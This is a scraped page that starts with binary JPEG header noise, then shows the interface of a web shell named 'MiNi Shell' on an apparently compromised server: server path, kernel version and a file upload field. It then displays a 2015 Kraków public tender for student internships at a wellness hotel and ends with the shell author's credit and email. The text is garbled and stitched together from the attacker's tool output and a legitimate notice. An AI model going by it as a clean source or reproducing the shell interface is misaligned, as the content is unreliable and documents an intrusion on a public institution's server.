JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150209/28554-N-2015.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji i przeprowadzenia  
staży - wizyt zawodoznawczych
 w hotelu wellness & spa
 w ramach realizacji projektu pn. 
Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 28554 - 2015; data zamieszczenia: 09.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 644 28 72; 12 644 28 71, faks 12 644 99 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zjewm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji i przeprowadzenia  
staży - wizyt zawodoznawczych
 w hotelu wellness & spa
 w ramach realizacji projektu pn. 
Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/.Przedmiotem niniejszego zamówienia jest usługa, polegająca na organizacji i przeprowadzeniu dwóch edycji staży-wizyt zawodoznawczych w hotelu wellness & spa dla uczniów i uczennic Technikum Turystyczno-Gastronomicznego w Zespole Szkół Ponadgimnazjalnych  w Myślenicach, ul. Zdrojowa 18 , w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
W ramach realizacji przedmiotu zamówienia do obowiązków Wykonawcy należy zapewnienie transportu, noclegów, wyżywienia oraz zorganizowanie staży-wizyt zawodoznawczych według programu określonego przez Zamawiającego.

2/.Przedmiotem niniejszego postępowania jest zorganizowanie                          i przeprowadzenie 2 edycji staży-wizyt zawodoznawczych dla 40 uczniów i uczennic Technikum Turystyczno-Gastronomicznego                         w Zespole Szkół Ponadgimnazjalnych  w Myślenicach, ul. Zdrojowa 18  w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 

3/.Wykonawca zobowiązany jest zapewnić na własny koszt wszystkie elementy związane z realizacją zamówienia, to jest w szczególności:
a.	pokryć koszty staży-wizyt zawodoznawczych w przypadku pobierania opłat przez hotel,
b.	zrealizować staże-wizyty zawodoznawcze przez wykwalifikowanego trenera posiadającego doświadczenie zawodowe i wiedzę merytoryczną z tematów objętych przedmiotem zamówienia,                      
c.	zapewnić dwóch opiekunów dla jednej grupy uczniów od momentu wyjazdu spod szkoły do powrotu do Myślenic, odpowiedzialnych za prawidłowy przebieg stażu i pobyt uczniów w hotelu, 
d.	zapewnić dostęp do gabinetów i sprzętu, będących wyposażeniem hotelu,  niezbędnych do realizacji programu stażu,
e.	zapewnić uczestnikom staży-wizyt zawodoznawczych wyżywienie, nocleg oraz transport na miejsce stażu i powrót,
f.	ubezpieczyć uczestników staży-wizyt zawodoznawczych od NNW na czas transportu i pobytu w hotelu,
g.	dostarczyć materiały szkoleniowe na własność dla każdego uczestnika (tj. kserokopie lub broszury tematyczne).

4/.Ramowy program staży-wizyt zawodoznawczych:  
obejmuje 16 godzin zajęć praktycznych na każdą edycję stażu (łącznie 32 godziny dla dwóch edycji). Przy czym przez 1 godzinę trwania  staży-wizyt zawodoznawczych Zamawiający rozumie godzinę zegarową - 60 minut.
W trakcie trwania stażu, w każdym dniu przewiduje się jedną przerwę  trwającą 45 min. 

Minimalna tematyka staży-wizyt zawodoznawczych musi obejmować niżej wymienione zagadnienia:
I dzień staży - wizyt zawodoznawczych:
 1. Animacja czasu wolnego - ćwiczenia praktyczne:  
 a. Szkolenie Nordic Walking,
 b. nauka gry w golfa,
 c. zabawy w wodzie  - aqua aerobic i samba. 
2. Kolacja live cooking.
II dzień staży - wizyt zawodoznawczych:
1.	1.Obserwacja i uczestnictwo w zabiegach rehabilitacyjnych 
i kosmetycznych. 
2.	2.Zapoznanie z rodzajami oferowanych w SPA usług oraz ich charakterystyką. 
3.	3.Przygotowanie gabinetów oraz wycena usług kosmetycznych. 4.Przygotowanie sali konferencyjnej oraz pokoi na przyjazd gości. 5.Rozmowa z działem kadr na temat oczekiwań przyszłych pracodawców wobec kandydatów na pracowników hotelu.

5/.Czas trwania staży-wizyt zawodoznawczych: 
Łącznie 32 godziny: po 16 godzin dla jednej edycji.
Przewiduje się 45 minutową przerwę obiadową w trakcie prowadzenia zajęć.

6/.Liczba uczestników staży - wizyt zawodowoznawczych: 
łącznie: 40 osób, w 2 edycjach po 20 uczniów (edycja I - 20 osób, edycja II - 20 osób).
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

Czas realizacji: do 30 kwietnia 2015 roku. Staż powinien zostać zorganizowany w weekend. 

7/.Miejsce realizacji stażu: hotel wellness & spa o standardzie czterogwiazdkowym, położony na terenie województwa małopolskiego w maksymalnej odległości 40-80 km od siedziby szkoły, wyposażony m.in. w salę konferencyjną, restaurację, bar, centrum spa&wellness, pole do nauki gry w golfa. Otoczenie hotelu musi umożliwiać aktywny wypoczynek wśród lasów i łąk oraz różnorodne atrakcje na świeżym powietrzu - niezbędne do prawidłowego zrealizowania programu kursu.

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 

8/.Szczegółowe wymagania dotyczące zakwaterowania:
Wykonawca zapewni zakwaterowanie grupy (40 noclegów) 
W I edycji stażu- wizyty zawodoznawczej planuje się jeden nocleg dla 20 osób tj. łącznie 20 noclegów.
W II edycji  stażu-wizyty zawodoznawczej planuje się  jeden nocleg dla 20 osób tj. łącznie 20 noclegów.
  Noclegi w miejscu odbywania stażu-wizyty zawodoznawczej 
w budynku stacjonarnym, spełniającym min. następujące wymagania:
restauracja  mieszcząca się w budynku zakwaterowania, 
pokoje  2-osobowe z samodzielnym węzłem higieniczno-sanitarnym.
Wyposażenie łazienki: wanna z baterią i natryskiem lub kabina natryskowa, umywalka z blatem lub półka, wc, lustro, gniazdko elektryczne, pojemnik na śmieci, brak ograniczeń w korzystaniu                           z ciepłej wody.
Minimalne wyposażenie pokoi: łóżka (w ilości odpowiadającej nazwie pokoju), pościel, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, stół/biurko, krzesło lub inny mebel do siedzenia, wieszak, telewizor, oświetlenie.
Obiekt nowoczesny, czysty, wyposażony w sprawne urządzenia sanitarne i techniczne.
Standard typowy obiektom czterogwiazdkowym.

9/.Szczegółowe wymagania związane z wyżywieniem:
Do obowiązków Wykonawcy należy zapewnienie wyżywienia uczestnikom staży- wizyt zawodoznawczych, w  tym łącznie w trakcie trwania zamówienia: 40 śniadań, 80 obiadów i 40 kolacji, zgodnie                  z następującym rozkładem (dla jednej edycji):   jednego śniadania              (w drugim dniu stażu-wizyty zawodoznawczej),  dwóch obiadów                     (w pierwszym, drugim dniu stażu-wizyty zawodoznawczej) i jednej kolacji (w pierwszym dniu stażu-wizyty zawodoznawczej). 
a.	śniadanie - pieczywo różnorodne, danie na ciepło: jajecznica lub kiełbaski na gorąco lub wędliny, ser żółty, dżem, świeże warzywa: pomidor, ogórek zielony, napoje: kawa, herbata, dodatki: cytryna, mleko, masło, 
b.	obiad - zupa, danie główne (mięsne z dodatkiem ziemniaków lub ryżu i zestawu surówek), napoje: kompot lub soki owocowe,
c.	kolacja - pieczywo różnorodne, wędliny, ser, świeże warzywa: pomidor, ogórek zielony, napoje: herbata, dodatki: cytryna, mleko, masło, woda mineralna gazowana lub niegazowana (0,33l/osobę).

10/.Transport
Wykonawca zapewni transport (autokarem lub busem) uczestników                   z Myślenic do miejsca realizacji staży i transport powrotny do Myślenic według planu:
1.	Wyjazd o godzinie 8.00 z Myślenic -  parking Zespołu Szkół Ponadgimnazjalnych  w Myślenicach, ul. Zdrojowa 18, przyjazd do hotelu (miejsce zakwaterowania) ok. godz. 9.30-9.45
2.	Zakwaterowanie  godz. 9.45
3.	Odbycie stażu-wizyty zawodoznawczej - 8 godzin: 
a.	Godzina rozpoczęcia: 10.00
b.	Godzina zakończenia: 18.45
c.	Obiad w przerwie ok. godz. 13.00
4.	Kolacja ok. 19.00
5.	Nocleg
II dzień
1.	Śniadanie godz. 7.15
2.	Odbycie stażu-wizyty zawodoznawczej - 8 godzin:
a.	Godzina rozpoczęcia: 8.00
b.	Godzina zakończenia:16.45
c.	Obiad w przerwie ok. godz. 13.00
3.	Wykwaterowanie i wyjazd do Myślenic ok. godz. 17.30
4.	Powrót do Myślenic ok. godz. 19.00

Transport odbędzie się pojazdem sprawnym technicznie, dopuszczonym na mocy przepisów drogowych do poruszania się, ubezpieczonym. Każdy uczestnik staży ma mieć zapewnione miejsce siedzące i miejsce na bagaż w luku bagażowym pojazdu.  W przypadku awarii środka transportu Wykonawca zapewni na własny koszt zastępczy środek transportu, spełniający warunki określone w SIWZ i umowie, w taki sposób aby nie powodować opóźnień czasowych. Zamawiający  nie będzie ponosił z tego tytułu żadnych dodatkowych kosztów. 
W przypadku, gdy Wykonawca nie  zapewni zastępczego środka transportu oraz kierowców w sytuacji powyżej określonej Zamawiający zleci osobie trzeciej wykonanie zastępczej usługi. Wykonawca ponosi koszty zapewnienia zastępczego środka transportu.
Wykonawca pokrywa wszystkie wymagane opłaty drogowe                                  i parkingowe.

Szczegółowe wymagania dotyczące ubezpieczenia:
Wykonawca zapewni ubezpieczenie NNW na czas transportu i pobytu dla każdego uczestnika staży-wizyt zawodoznawczych.

11/.W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będzie odbywał się staż-wizyta zawodoznawcza, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników stażu-wizyty zawodoznawczej o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach znaków zgodnie 
z wytycznymi POKL,
d.	odpowiedniego oznakowania pojazdu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.

12/.Wykonawca po zakończeniu stażu-wizyty zawodoznawczej przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników 
w każdym dniu stażu,
b.	program stażu oraz dziennik zajęć,
c.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
d.	listy z potwierdzeniem wykonania usługi wyżywienia, noclegu 
i transportu, potwierdzone własnoręcznymi podpisami uczestników,
e.	oryginały ankiet ewaluacyjnych, 
f.	kopie wydanych certyfikatów/zaświadczeń oraz listy potwierdzające ich odbiór przez uczestników, 
g.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.27.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami
zdolnymi do wykonania zamówienia Zamawiający uzna
Wykonawców, którzy dysponują co najmniej jedną osobą, posiadającą wykształcenie wyższe, będącą pracownikiem hotelu, w którym odbywa się staż-wizyta zawodoznawcza oraz posiadającą minimum 2 letni staż pracy w w/w hotelu i wiedzę merytoryczną z tematów objętych przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program stażu-wizyty zawodoznawczej</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy. 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze lub w Centralnej Ewidencji i Informacji o Działalności Gospodarczej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - dodatkowy moduł programu - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zjewm.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2015 godzina 12:15, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com